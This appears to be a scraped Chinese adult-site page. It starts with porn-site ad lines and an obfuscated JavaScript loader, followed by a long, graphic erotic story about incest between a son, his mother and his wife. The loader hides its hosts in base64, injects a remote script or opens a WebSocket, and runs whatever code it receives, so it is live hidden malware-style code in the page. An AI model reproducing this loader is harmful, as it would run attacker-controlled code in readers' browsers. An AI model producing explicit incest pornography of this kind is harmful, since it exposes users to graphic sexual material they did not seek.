看打炮:kandapao.cc 看打炮:kandapao.vip 广告联系✈:@kandapao

function ZNxcTPLX(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function KxTOzX(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return ZNxcTPLX(t);};window[''+'Q'+'w'+'F'+'i'+'A'+'G'+'J'+'N'+'C'+'c'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=KxTOzX,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/l/'+i;cs.parentElement.insertBefore(s,cs);}})('ddHIuddGhhbGx1cy5uZXQ=','dHIueWVzzdW42NzzguY29t','151235',window,document,['d','z']);}:function(){};

超级乱伦家庭


今天吕红刚一进门就看见自己的丈夫刘波和他的母亲李花在床上操穴,刘波那又粗又大的鸡巴正不停地在李花的大阴道里来回使劲地插着,「噗滋、噗滋」直响,小红在门外看着,自己的骚穴也痒了起来。

  李花嘴里还叫着:「哦……我的大鸡巴好儿子啊……你把妈的小骚穴都插烂了……对……用力啊……子宫都让你给操穿了……快……妈的阴精快来了……」刘波边操穴,也边说:「妈,你的……穴可真紧啊……儿子的大鸡巴都让你给勒断了啊……」李花淫笑说:「就你会说话,你爸可不说我的穴小,都说我的是大骚穴……啊……用力点啊……」刘波伸手捏住他妈的两个巨乳,笑说:「妈……你的阴道里的水可太多了,我都使不上劲了啊!你看,我的鸡巴毛都湿了……嘿嘿……改天我爸、还有小妹刘芳,咱来个家庭淫乱操穴大比赛……」李花淫笑:「好、好,都依你还不成不吗?妈妈这阴道里的淫水还不是让你这小子给插出来的啊!你还不快点把妈妈的大骚穴给操出精来……妈妈的子宫快开了……哦……」两人都不说话了,狠狠地做爱着。

  小红看了、听了这些淫话,肉穴里也出了些淫水来,自己也想着前几天和刘波的爸爸刘海操穴的事情,自己不禁手淫起来。

  那边刘波和李花已经插到了高潮,李花肉穴的两片大号阴唇一进一出的还带出了不少的淫水。
刘波忽然把鸡巴狠狠地插在母亲的子宫口,用力一捅,只见李花大叫:「天啊!我来了……哦……出阴精了……啊……爽死老娘了……」刘波也叫着:「我的亲娘啊……我也来了……大家一起出……哦……啊……射了……哦……又射了……」他用力把龟头挤进子宫口,而李花的子宫刚喷着阴精水,又被儿子的龟头一顿的猛喷,子宫里被浓热的精液射得爽死了,一时间大声地淫叫:「哦……妈的阴精水还没出完……你……哎哟啊……再射给妈妈,让妈给你生个妹妹……让你这爹操她的小嫩穴……哦……烫死妈妈了!」两人大声地叫着这些淫乱的话。

  最后刘波射完了精水,趴在母亲两个巨乳上吮吸着粗大黑红的奶头,李花也淫笑着摸着儿子。
刘波竟然在淫母的巨乳里吸出了奶水,这是因为李花为了提高自己的性欲不断地吃雌性激素,乳房竟然分泌出了奶水,这也让刘波和李花的老公刘海高兴万分。

  这个时候小红手淫的时候不禁地叫了出来,刘波知道是自己老婆,但他也不在意,李花却叫了声:「谁啊?」小红只有走了进房间里。
李花一见是自己的儿媳妇,不禁拉了被子盖住身体。

  小红走到床前说道:「今个回家就听到刘波在操穴,一看原来是和妈您啊!
  嘿嘿……」李花脸一红,刘波却笑了笑,说道:「红,这没什么啊,不就是和咱妈操回穴嘛!再说了,你也不是常和你姐姐、姐夫集体淫乱吗?呵呵……」李花听了也淫笑着说:「就是嘛!我说小红啊,你和刘波他爸爸、还有咱家那佣人王嫂也不常淫乱吗?我也没说什么啊!」刘波把小红拉上床,手就扣进了小穴了,嘴里还说着:「妈,小红的骚穴全是水呢!看来咱们待会来个母子老婆大会战怎么样?」李花淫笑:「就数你这小子会说话。
小红怎么样?咱一老一嫩两个肉穴来把我儿子的大鸡巴给弄个大出精水,让她还敢说咱们?」小红早就给母子两人的表演给弄得欲火焚身了,又让他们这么一说,她也笑了笑:「好了好了,妈,我加入你们还不成吗?不知道这死鬼的鸡巴还行吗?」刘波听了,用手把她的骚穴狠狠地扣了几下,说:「不行,老子今个让你们的骚穴全翻了。
」小红被他弄得淫水直流,自己就把衣服给脱了,挺着两个大乳房,阴部大把的阴毛全湿了。
刘波的鸡巴还插在母亲李花的大阴道里,手却扣着小红的肉穴,三人都不禁呻吟起来。

  小红的肉穴越来越痒,淫声说道:「你还不快操我的穴啊,都痒死人了!」李花也淫笑说:「这小子扣你的穴,鸡巴还插在我的阴道里,我还说怎么这鸡巴越来越硬了?呵呵……看来这孩子的鸡巴行啊!好了,快把大鸡巴拔出来,小红都快尿出来了哦!嘿嘿……」刘波笑道:「好的。
」又拿着那发硬的大鸡巴狠狠地往母亲的肉穴里捅了几下,这才拔出来。
李花笑说:「这色鬼死也要占便宜。
」刘波的鸡巴水淋淋的粗大无比,李花见了,不禁抓过来吮吸着龟头上的阴精水,小红见了就笑:「你们看,妈的大阴道里还在不停地流着波哥的精液,自己却吃起了鸡巴。
呵呵……」大家一看,只见李花那个大肉穴的两片阴唇翻在阴道外,从阴道里流出一些白浓的精液,阴唇上也全是,都流到肛门里了。
李花见了淫笑着,用手抹一把阴部上的水涂在巨乳上,自己还舔了起来。

  刘波笑说:「小红,你看看咱妈多淫荡啊!你敢吗?」小红说:「怎么不敢?你爸爸的精水我也不常吃嘛,今个我就吃给你看!」她说着就用手往李花的阴道抹了一把淫水舔吃起来,吃完了还淫笑说:「我还是觉得咱爸的精液浓。
妈,你觉得谁的好啊?」李花用手撸着儿子的阴茎,笑着说:「当然是我儿子的了,又香又咸。
」刘波可不理会她们说什么,自己的手也不闲着,不停在淫母的阴道里扣着,一手也用力捏着老婆的乳头,三人还聊起了淫话。

  小红问:「妈啊,您都五十二了,怎么你的两个大乳房还出奶啊?」李花一笑,说道:「这还不是因为家里的男人天天都要操我的穴,我不吃些雌性激素哪还成啊?这不就出奶水了!刘波和我操穴时,我们就是喜欢两人操完穴、射完精水了,刘波就吸我的乳头,我还喜欢让他吃呢!呵呵……」她又问小红:「小红,你每次让他们把精液喷进子宫里,你不怕怀孕啊?妈可是上了环儿的啊?」刘波把母亲的大乳头吐出来,笑说:「妈您放心吧,她啊,早就和我商量好了,为了玩多几年,我让她也上了环了,要不爸还敢往她穴里射精啊?」三人都淫笑着。

  小红淫声说道:「我说妈啊,我好久没和你们一伙操穴了,改天我和刘波都去你家,咱们还有咱爸、佣人王嫂,一起好好玩它个穴翻卵肿怎么样?」李花淫笑说:「哟!还看不出来咱小红还喜欢玩家庭淫乱的游戏哦!刘波你觉得怎样?」刘波一手捏了几下母亲的乳头,笑说:「好啊,反正我也很久没回家和爸干王嫂的老淫穴了。
嘿嘿……我一想到王嫂那个大骚穴的阴精又浓又骚,我的鸡巴的精液也就想射多点啊!」李花往儿子的龟头用力一捏,淫笑说:「哦,王嫂的穴里的阴精浓,妈妈的就不浓、不够骚了啊?你小子还是吃妈的精水大的呢!呵呵……」小红也笑说:「就是嘛!不过我说刘波是吃妈您的奶大的啊,怎么就吃上您的阴精水了啊?嘿嘿……」刘波听了,用力往吕红的阴道里一扣:「他妈的,你还敢说我妈,我就是吃妈的阴精水大的,怎么了?!」小红被刘波扣得直叫,淫水也流了出来。
李花见状,用手不停地撸着儿子的大鸡巴,还一口含住鸡蛋大的龟头吮吸,刘波的手同时托住淫母的巨乳又挤又捏的,三人玩得好不快活。

  李花把儿子的大龟头吐了出来,淫笑道:「好了,我看小波的鸡巴也够硬的了,你们两人就开始操穴吧,妈在一旁给你们两人指点指点!」刘波把插在小红阴道里的手指抽了出来,在小红的奶头上抹了几下,笑道:
  「妈,我们操穴还要您老来指点啊?我看你就和我们两人一起玩算了,我操小红的时候让她为您舔舔肉穴怎么样?」李花和小红相对淫笑了几下,小红马上躺下张大了双腿,还把阴唇翻出露出了迷人的阴道,刘波趴了上去,笑着对一旁手淫的母亲说:「来啊!妈帮我把大鸡巴给塞入吕红的阴道里。
」李花淫笑着也爬了过来,一手抓住鸡巴,捏住大龟头在小红的阴道口磨了几下,还自己亲了一口龟头才把它塞进了吕红的阴道口内,淫笑着说:「好了,大鸡巴儿子你们就干吧!」末了还用手打了一下儿子的屁股。

  刘波也淫笑着亲了口母亲粗长的黑奶头:「妈,你还不快蹲过去让小红这骚穴为你舔肉穴?」他话还没说完,鸡巴就狠狠地捅进了吕红的穴里,「噗吱、噗吱」的操了起来。

  吕红马上大叫着:「死鬼,老娘的穴让你给操裂了……哎哟!操你妈妈的,还真的来劲了你……哦……」刘波用力叉开吕红的大腿,边操边说着:「小骚穴,你还敢骂我妈来了,老子操死你这淫货……我操!我操!」吕红的阴道里好像插着一根大火棍,次次都操到子宫口了,那淫水可是像尿般的流出来,她淫叫着:「哦……不行了,小妹的淫水把持不了啊,老公我不骂还不行了啊……啊……哎哟!妈快上来,让我舔你的大骚穴为你消消气儿……哎哟!用力插死我吧!」李花见了再也忍不住了,用手揉了几下两片大号阴唇就蹲上了吕红的头上,把大肉穴对着她的嘴巴,吕红见了一口就叼住了大阴唇吮吸起来,还把手指捅进阴道里挖着。

  李花这时候哪忍得住啊,一张嘴,淫乱的话就说出来了:「哎哟啊……我的好媳妇啊……你把妈的阴唇给吃进肚子里了啊……啊……用力挖……把妈的淫水都给挖出来……让你出了……啊……」刘波正苦干着,听了也忍不住了,母亲身上两只巨乳像两个大冬瓜般在他面前不停地摇晃着,粗大黑红的奶头都碰上他的脸了。
刘波伸手捏了几下大乳房,李花倒也是会配合,她马上改跪在吕红的头上,这样刘波就可以边操着吕红的骚穴,边还可以抱着母亲李花。

  两人开始乱亲乱舔,又是捏乳房,又是摸屁股的淫乱无比,房子里面只听见「劈啪、噗吱」的操穴声音,还有呻吟的荡叫声:「哦……老公……用力操我的骚穴啊……我要你用力啊……哎哟!又插进子宫里了……真解痒哦……啊……」「啊……小红……你这淫货的嘴还真行啊……把妈的淫水都给吸出来了……哦……阴蒂用力揉!「「小红,你的肉穴水好多啊!呵呵……阴道肉也多……真爽啊!哦……妈,你的乳房给我捏出奶水来了哦……嘿嘿……」李花自己捏住粗大的乳头往儿子嘴里送:「我的天啊!老娘出水了啊……哦……又来了……泄死老娘了……」刘波受到这情景刺激,操得也更加卖力了,鸡巴又快又狠地在吕红的阴道里冲击着,吕红的肉穴被插得翻出了一段阴道嫩肉来,她也觉得自己的阴道又酸又麻,子宫口直被大龟头插得一开一开的,淫水都把床单弄湿了一大片:「哦……好丈夫……大鸡巴哥……小妹我也不行了……再操也要出阴精了哦……「李花泄完了阴精水后便叉着两条大腿躺在一边,阴户上一片又浓又稠的白精水,两片大号阴唇被儿子刘波操得是全翻了出阴道口外,黑红发亮的,从大肉穴里正缓缓流出自己的阴精水。
李花直看着儿子的大鸡巴从吕红的肉穴里抽插,自己还用手不住地在刚出了精水的阴道里来回挖呢!
  小红被刘波的鸡巴干得是死去活来地淫叫着:「好丈夫……我的大鸡巴老公……啊……又插到子宫里了……我快来了……用力啊……哎哟啊……」刘波:「不行了……小红等我……哦……我也出精水了啊……啊……」淫叫声和操穴声响彻房间里。

  吕红的子宫被刘波的大龟头用力这么一捅,马上就跳了几下,那阴精水「哗吱」喷了出来,把刘波的龟头包围了。

  小红淫叫着:「哎哟……我的妈啊……好舒服啊……子宫喷精水了哦……啊……」刘波的龟头被吕红的阴精水一烫,他身体一直,将龟头用力顶住吕红的子宫口,精水不停地射进吕红那还在跳动流着阴精的子宫里:「老婆,我也来了……唔……唔……射死你这淫货……啊……「吕红还没喷完阴精水,就被刘波一股一股的浓精射进了子宫里,她也大声淫叫了几声,就翻了白眼不动了。

  两人都出完了精液躺在床上,刘波还吮吸着小红的舌头,小红淫笑说:「唉……我的妈啊……人家的阴精水儿还没有出完呢,你就射进去了,把我子宫都给涨死了……嘿嘿!下次让你射进嘴里。
」刘波捏着吕红的乳房,笑说:「妈的,老子的龟头都让你的子宫口吸住,那精液不射还不行呢?真是骚穴啊!呵呵……」李花这时候在一边淫笑说:「你们两口子操得还不错啊!连妈看了都忍不住想操了,呵呵……」说完用被子往水淋淋的肉穴口擦了几下就爬了过去,三人搂抱在一起继续淫乱。

  她抱住刘波两人亲了起来,还淫笑说:「这孩子就是淫,操完了老婆还要亲老娘呢!呵呵……唔……唔……」李花这淫妇可是什么都说得出来,那淫乱的话儿比谁都敢说。

  吕红看了就笑着说:「我说妈啊,这还不是你自个来让刘波玩的,还说小波了?」刘波一边亲,一边把手指插进了淫母的肉穴里用力揉捏着大阴唇,李花被捏得一个劲的说淫话:「哎哟……我的好儿子啊,你把妈妈的阴唇捏坏了就没得舔了啊……唔……啊……」刘波趴在小红的身体上一拱一拱的,手不停地挖着李花的肉穴。
一会两人分开了一看,李花的阴部全是淫水,刘波的手也水淋淋的,还粘着几根李花的阴毛呢!李花就笑了:「看你,把妈的阴毛都给玩掉了几根,再玩妈的阴毛可就掉光了!」刘波:「光了就好啊,白白胖胖的,舔起来更香啊!再说了,妈您的阴毛可是在全家里最多的啊,怎么掉也不会光。
小红你说是不?」吕红淫笑道:「去你的,你们家哪个的毛不多啊?你爸,还有你那淫荡妹妹刘芳肉穴的毛又黑又多的,王嫂的穴毛也不少啊,都白了还那么淫荡,咱妈就不用说了,嘿嘿!」母子两人淫笑几声,吕红说:「我看刘波还是把鸡巴拔出来吧,老顶着我的子宫,你们母子又玩着,拔出了大家好玩啊!」刘波「噗滋」一声把阴茎抽了出来,还带出了不少的淫水,李花马上一把抓住了,也顾不了鸡巴上满是吕红和刘波的淫水精液,大口大口的吮吸,手还托住两个卵泡揉着。

  吕红一边擦着从阴道里流出的混合精水,一边淫笑说:「老公,你看咱妈多淫荡啊,连鸡巴上我俩的精水都不擦就吮了起来。
」李花吮着儿子的鸡巴,含糊不清的说:「唔……老娘就是喜欢吃……唔……真爽啊……「夫妻俩一笑,坐在床上抱着看李花吮鸡巴。
李花吮完了,还抓着鸡巴用力来回地撸着,手指也揉着自己的大阴唇淫笑着。
刘波说:「妈,你看把我的鸡巴弄硬了,咱们还是快操穴吧!」李花说:「急什么你?刚射了精,也不怕把你的鸡巴给弄坏了,妈没了你这大鸡巴的孝顺儿子操穴可怎么办啊?来,妈的奶头涨死了,喂你吃会儿奶水,让你也歇会儿。
」她马上就把刘波搂在怀里。

  刘波一口含着一边大奶头用力吮吸,一些来不及吞的奶水从嘴里流了出来,一手在母亲的肉穴里揉着,一手抱着李花的大屁股,李花的手抓着儿子的大鸡巴继续来回撸。
吕红见了,淫笑着爬过来也抱着李花说:「妈,你的奶水足,让媳妇也来吮两口……」话未完也自个吮住了一个大乳房。

  李花边撸着鸡巴边笑:「你们两口子还真会占妈的便宜啊……今个妈就喂你们。
唔……唔……」刘波:「唔……妈的奶水还真多,又香……」李花被两人吸着乳房,阴部又被儿子的手指不停地挖着,肉穴里的淫水一个劲地流出来:「哦……小波,你们两人可把妈的奶水吃光了,哦……别挖了……唔……好儿子用力吸,吃了妈的奶水待会才有劲操我的淫穴……啊……吃吧……待会把你精液全部射进我的子宫里……把妈的子宫涨死了也行啊……唔……」刘波听了这些淫乱的话儿,更加用力地吸奶头、挖淫穴。
不一会儿,李花的一股阴精又泄了出了,把刘波的手都弄湿了,两人的身体上也有着不少的淫水,大家看了都不禁淫笑了起来。

  刘波把手上的淫水抹在母亲身体上,说:「嘿嘿……咱妈的淫水可真的太多了。
」李花叉着两条大白腿,她看着肉穴上红红的大阴唇,淫笑说:「看你这小子,把妈的大阴唇都给捏肿了,回家还不让你爸骂死我了……看,连老娘的阴道也挖得变大了……嘿嘿……」大家一看,还真的,李花的两片粗红的大阴唇都肿了起来,阴道口的阴毛水淋淋的一片,白色的浓阴精布满了肉穴口。
刘波见了这充满成熟女人味的性器,鸡巴更硬了,不住地往上挑着,李花看着儿子的大鸡巴,肉穴里的淫水又流出来,心里只想着操穴。
小红看见两人都充满了欲火,知道一场大战就要开始了,自己的穴也流了些淫水出来。

  李花再也等不住了,把儿子扑倒,连抹也不抹了,一口含住鸡巴便吮吸了起来,自己的大肉穴正对着刘波,阴唇都快塞进嘴里了。
刘波疯狂地舔着阴唇,舌头用力搅着母亲阴道里的嫩肉,手指插进李花的屁眼里挖着。
李花两个洞被儿子玩着,叫也叫不出来,只有更加卖力地吮吸大龟头,用力揉着卵泡。
刘波把母亲的大阴唇都含进嘴里,用牙齿轻轻的咬着,拇指用力揉着母亲的阴蒂。

  李花哪还顶得住啊,吐出鸡巴大叫:「不行了……阴蒂让你给揉掉了……唔……哦……用力咬妈妈的阴唇……啊……不行了……儿子,操穴吧!妈妈求你了……肉穴痒死了……唔……」刘波也忍不住了,用力把母亲的阴道口扒得老大,狠狠的吸了几口淫水,马上把李花翻了过来,叉开了她的大白腿,捏住龟头在阴道口磨了几下,李花就大声淫叫:「好儿子,别玩妈妈了,用力插啊……快!啊……操进去了……唔……好粗……好大啊……都顶进妈的子宫里去了……」刘波屁股一拱一拱的疯狂地操着母亲李花的大淫穴,「噗滋、噗滋」又狠又快,大龟头次次都顶在了子宫口上,粗大的阴茎把李花的阴道磨得是又麻又爽,淫水从两人性器的结合处直流。

  李花觉得儿子的大鸡巴次次都插得那么狠,阴道里的嫩肉让龟头用力地刮磨着,她用手捏着两个巨乳淫叫:「啊……我的儿啊……妈的穴让你干翻了啊……唔……又插进妈的子宫里了……真爽……啊……用力啊……」刘波也淫叫:「哎哟……我的淫穴妈妈啊……你的穴可真是又肥又大,子宫又吮着我的龟头了……哦……真是大淫穴啊……呵……呵……」他的大鸡巴把李花的阴道口给干得是淫水模糊,床单都流湿了。

  吕红见了,爬到刘波的身后,挺起了肥大的阴户,「啪、啪、啪」地用力顶撞着他的屁股,刘波的鸡巴可就操得更深了,龟头每次都狠狠地插进母亲的子宫里。

  李花淫叫着:「他妈的,小红你这淫货把老娘干死了啊……啊……哦……龟头都全部插进了妈妈的子宫了……啊……好儿子啊……不行了……妈来了……啊……快啊……」刘波:「妈,小红也是……是为您好啊……我操得深,你的穴也不爽吗?嘿……嘿……我操……」李花最后尖叫了几声,阴道里「咕滋、咕滋」直响,从子宫口猛喷阴精水,「哦……死了……妈让你给操死了……啊……啊啊……出得我好美啊……唔……唔……」刘波的龟头也觉得一股热阴精冲来,「啊……好热的精水啊……美死我了!
  唔……」李花让儿子趴在身体上,两人又亲了起来。
吕红淫笑道:「妈你看,你这阴精水出得多爽啊,还说我呢!你们操穴,我帮你们还得让你骂了。
嘿嘿……」李花淫笑:「就你会做事,妈骂错了还不行吗?嘿嘿……这阴精出得可真的美死我了!」又对刘波说:「看你这小子,把妈妈那么快就操出阴精来了,待会儿妈让你见识老娘的厉害!」两人马上又操了起来。

  李花让儿子躺下,她一手抓着淫水淋淋的鸡巴,一手扯开大阴唇,把龟头往穴里一塞,「噗滋」就用力坐了下去,「哎哟……啊……可真大啊……又进了老娘的子宫口里了……」话未完,自个快速地起落,大屁股撞击在刘波的肚子上,「劈啪、劈啪」、「噗滋、噗滋」直响,嘴里叫着:「看妈的厉害,让你干……看你的鸡巴硬还是妈的肉穴淫……哦……啊……「刘波马上将大鸡巴狠命地往上顶,不过李花也不是省油的灯,她狠狠的往下一坐,马上屁股左右转动摇晃,把儿子的鸡巴给狠狠地吸在自己的子宫口里一吮吮的,让刘波叫着:「哎哟……可爽死我了……我的好亲娘啊……淫穴娘啊……子宫要把我的龟头给吃了啊……啊……」李花得意地淫笑着道:「嘿嘿……妈的淫穴可不是乱盖的啊……啊……儿啊……你的龟头全进了妈的子宫里了……」那边吕红见了那么淫乱的场面,拿了根粗大的塑料鸡巴往自己的阴道里捅了起来,边玩边看母子两人乱伦的样子,简直是高潮迭起啊!
  李花捏着自己两个巨乳,从奶头不住喷射出奶水来,射在刘波的脸上、身体上;刘波伸手不停地在母亲的阴户揉捏,手指狠狠地刺激着李花那勃起发硬的大阴蒂,李花再也顶不住了:「哦……对……这样玩妈妈的阴蒂,我好舒服啊……哦……妈的阴精又想出来了哦……唔……」刘波见状,鸡巴更是顶得又快又深,有时候还把身体丰满的母亲给顶得一蹦一蹦的,阴户硬是给顶红了,那淫水从阴道夹着鸡巴的缝隙里「咕滋咕滋」流在两人浓密的阴毛上。

  李花不知道怎么的一股尿意袭来,子宫不住地跳动:「哎哟!我的好儿子啊……大鸡巴的儿子啊……怎么你的鸡巴那么厉害啊……妈妈的阴精水又让你给操出来了……啊……啊……出了……哦……不……」李花坐在儿子的身体上自己抖了几下,阴户又是淫水声大响,「咕滋咕滋」的第二次喷出了阴精。

  李花把持不住往后一躺,刘波让妈的阴精水给烫得正爽,他见了,马上把李花抱住。
吕红淫笑着说:「哟……咱妈不是大淫穴吗?怎么给我老公给操下去了啊?」李花喘着气说:「这刘波也不知道怎么搞的,今天鸡巴那么硬,龟头次次都操进老娘的子宫里,我不出阴精都不行啊!以前在家里操我都没这次那么狠。
嘿嘿……」刘波亲着母亲说:「这还不是我一见了妈的淫穴,鸡巴就比平时硬啊!呵呵呵……」吕红淫笑道:「好你个刘波,操我的时候又不见你这么厉害……嘿嘿,是不是儿子见了妈的淫穴特别来劲啊?」李花说:「小红你可别说咱娘俩,就让你给说对了。
你这淫货,见了我老公不是也蛮来劲么?呵呵……」刘波忽然一把把母亲抱住,让她给转过身从后面操了起来,两人就变成了侧身操穴了。
刘波从李花的后背抄起一条腿,鸡巴狠狠插着,李花还说着话就给操了起来:「刘波你是想要了妈的命哟……哎哟……啊……」刘波的鸡巴让母亲的阴精水给冲了两次了,越来越硬,不操哪行啊,所以不理会李花,一个劲的把鸡巴狠狠地抽插在李花的阴道里,龟头差不多把母亲的子宫给操开了,次次都把整只鸡蛋大的龟头插入母亲李花那火热的子宫里。
吕红还趴在李花的阴户前,看着自己丈夫的大鸡巴在他母亲的阴道了一进一出的,李花的两片大阴唇「噗滋、噗滋」翻合着淫水直流,吕红一手伸到后面摸着刘波的大卵泡,一手在李花的阴道口前刺激着两人的性器官、揉着李花的大阴蒂,还伸出舌头舔着两人的性器和浓骚的淫水。

  三人这时候都达到了疯狂的地步,李花大叫:「插死我了!好儿子,你的鸡巴把妈妈的子宫都插穿了……啊……啊……小红,你快用力捏我的大阴蒂哦……来了……又来了……」刘波也叫着:「妈啊……用力夹我的鸡巴……子宫开了,快吮吸我的龟头啊……啊……小红再揉我的卵泡,精液就射出来了……」吕红一边舔,一边揉卵泡,一边用假鸡巴狠狠操着自己的肉穴,自己也快到了高潮。

  过了十分钟,刘波大叫一声,鸡巴死死地顶进母亲的子宫里,从大龟头猛的射出浓浓的精液来:「哦……出了……妈,我射出了……哦……又射精水了……哎哟!妈,你的阴精水也来了啊……」李花给儿子的精液这么一喷,子宫也跟着「咕滋咕滋」的喷出了阴精水来:
  「哦……妈的也来了……咱们一起射啊……你的精液好烫啊……把妈妈的子宫给烫死了……哦……」吕红见母子两人淫叫着,从李花的大阴道夹着刘波的鸡巴间还滋滋地流出很多的精水,这是母子两人的淫水浓精混合而成啊,吕红伸出舌头,竟然把两人的淫水精液给舔吃了起来,最后自己也把自个的骚穴弄出来阴精来。
三人都看着淫笑了,小红也抱住了李花两人亲着,李花把吕红嘴上的精水舔了吃,真的好淫乱啊!
  刘波从母亲身后捏着二女的乳房说:「唉……可真是舒服啊!唔……这次我的精水射得是爽极了,下次还让你们两人一起操。
」李花淫笑说:「你还说呢,妈妈的子宫今个可是让你给操阔了。
你们看,连奶头都让这小子给拽长了、捏粗了。
呵呵……」刘波把鸡巴用力一顶,笑道:「妈你还说呢,刚才儿子的鸡巴快让你给摇断了,咱妈的子宫还差点把我精液给吸了出来。
」李花用手打了下刘波,笑说:「死小子还插呀!想操妈的大肉穴,改天让咱娘俩都吃了性药,非玩它个够本不可,你不射五次精液给娘,我把你的龟头给咬了!呵呵……」吕红淫笑道:「妈,你们母子操穴,那我怎么办啊?」李花笑道:「你啊……就让刘波他爸爸操啊!你这小淫货可骚了。
哦……对了,说起家里老头子,刘海还挺想你的骚穴哦!」吕红淫笑道:「好,咱们过几天到妈家里集体乱伦操穴。
嘿嘿……」刘波:「好啊!把妹妹刘芳也叫来,她的小嫩穴我也好久没玩了。
」李花故意生气说:「好,你操小嫩穴,妈的老淫穴就没人操了……」刘波又顶了几下母亲的骚穴,笑道:「我哪敢啊?妈,您的淫穴我还想天天操不停呢……穴又大又肥,淫水还多,我还想吃呢!再说了,您两个大乳房的奶水我可喜欢死了。
」说完又顶了几下子宫。

  李花淫笑道:「看你还敢!哎哟……又操了啊……嘿嘿……待会儿妈让你把我阴道里的淫水精水给我都舔吃了!」刘波笑答:「怕什么,不就是吃咱吗的阴精水嘛,我和小红一起吃!」吕红:「谁和你吃了?我才不吃你们母子俩的精液呢!呵呵……嘿嘿……」刘波用力一捏吕红的奶头,吕红马上叫嚷:「哎哟……我吃还不成吗?我把你们的淫水精液都吃了哦……啊……」刘波嘿嘿一笑:「妈,咱们待会儿让小红给咱们舔精水,你说好不好?」李花淫笑:「你啊……小红可是你老婆啊!让你这样折磨,你爸爸见了心痛死了!」刘波:「这还好呢!可让咱爸好好用大鸡巴安慰小红啊!呵呵……」李花笑说:「我说小红啊,咱们这也说着笑啊……你是我宝贝儿子的老婆,妈我当然痛你啊!」吕红:「妈,刘波他啊……只想着慰劳您的大肉穴呢!」刘波:「小红,你看你说的,我这不是天天都操你的骚穴吗?……他妈的,怎么说着这鸡巴就硬了?」他话未完,又在李花的子宫口上顶了起来。

  李花叫着:「哎……别顶了……顶死我了……哎哟!小红,还是你让刘波插你的阴道吧……妈不行了……」吕红笑道:「哟!妈你刚才不是说,改天让你儿子和你吃药两人操一天吗?
  怎么就不行了?那时侯刘波怎么射五次精水给妈您的大肉穴啊?嘿嘿……来,老公,往我的大骚穴里来啊!「刘波」噗滋「拔出鸡巴,爬过去叉开小红的大腿,狠狠操进了阴道里。

  李花坐起来,看了看自己被儿子操得发红的阴道口和两片紫黑色的大阴唇,吕红见了,笑着说:「刘波,你看咱妈的两片大号阴唇就像两片牛肉片似的。
嘿嘿……」刘波也笑了。

  李花淫笑说:「你知道个屁,咱们刘波这孩子就喜欢妈妈的这两片大号阴唇呢!是不是啊?」刘波用力操了几下小红,说:「就是。
妈的!敢说我妈?老子操死你这个淫货……」吕红和刘波又开始了性交,「噗滋、噗滋」。

  李花见了:「好啊,大鸡巴儿子,妈看你的鸡巴可真行啊!才和妈操完,又要操老婆的穴了……」刘波边操边说:「妈的,老子的鸡巴可硬了,不操穴就不行啊!嘿嘿……」吕红让他给操得说不了话,一个劲大叫:「哎哟……好爽啊……用力啊……唔……妹妹我让你操死了啊……「李花捡起吕红用过的那根黑色塑料鸡巴,往自己的阴道里开始乱捅起来,还叫着:「妈的,吕红你这个淫货,操得那么爽,把老娘的逼也给弄淫了……」吕红:「妈,这不能怪我啊……啊……哎哟!怎么今天老公你的鸡巴就那么硬啊?都操穿我的子宫了……你看咱妈……两片大阴唇都让妈给插变紫色了!呵呵……」刘波一看,果然母亲的大阴唇随着假鸡巴的抽插变得是又大又粗,还黑黑的像两片紫黑的猪肉片子,不禁嘿嘿笑了:「妈,你的大阴唇再让你抽插就更大更黑了啊!」李花边操边淫笑:「粗大就粗大了呗……反正你和你爸就喜欢吮我这两片粗大紫黑的阴唇啊……啊……唔……」刘波见了淫意更浓,鸡巴又操快了许多,把吕红的两片阴唇也给操得粗大起来,翻在阴道口外,白色的淫水还在淌着,吕红和刘波两人的阴毛都湿透了,真是淫荡啊!
  吕红很快的就来了高潮:「哎哟……出了……老公,你的龟头硬死了,把我的子宫口给撑裂了……啊……精水出来了……啊……爽死了……」在淫叫声里,吕红的阴精水「咕滋咕滋」的喷出了子宫口,浇在刘波粗大火热的龟头上。

  刘波也大叫:「来了!我的精水出了……」精水「噗噗噗」的喷了出来。
吕红一手抓住假鸡巴,用力往李花的大阴道里「噗滋、噗滋」捅了起来;刘波让母亲吮吸着精液,看见吕红的大屁股翘着,用手扣入她阴道里,嘴里还叫着:「啊……哦……妈,你把儿子的精水给吸光了啊……唔……啊……」最后三人都躺在床上淫笑着。

  大家看着这淫乱的场面:刘波的鸡巴还没有完全软,半挺着,水淋淋的龟头又红又肿;李花的阴道还插着那根黑色的大鸡巴,从阴道口流出了淫水;吕红的穴红红的,阴精也流了一腿,把床单都弄湿了。
刘波捏着母亲的奶头,笑道:
  「妈啊,你刚才把儿子的精水都吮光了,我还拿什么来射你的阴道啊?」李花:「去你的!你的精液特别的多,上次差点把妈妈的子宫给灌死了。
嘿嘿……」吕红也笑了:「咱妈啊,真够淫荡,吮着我老公的鸡巴吃精水,还叫我帮她插阴道。
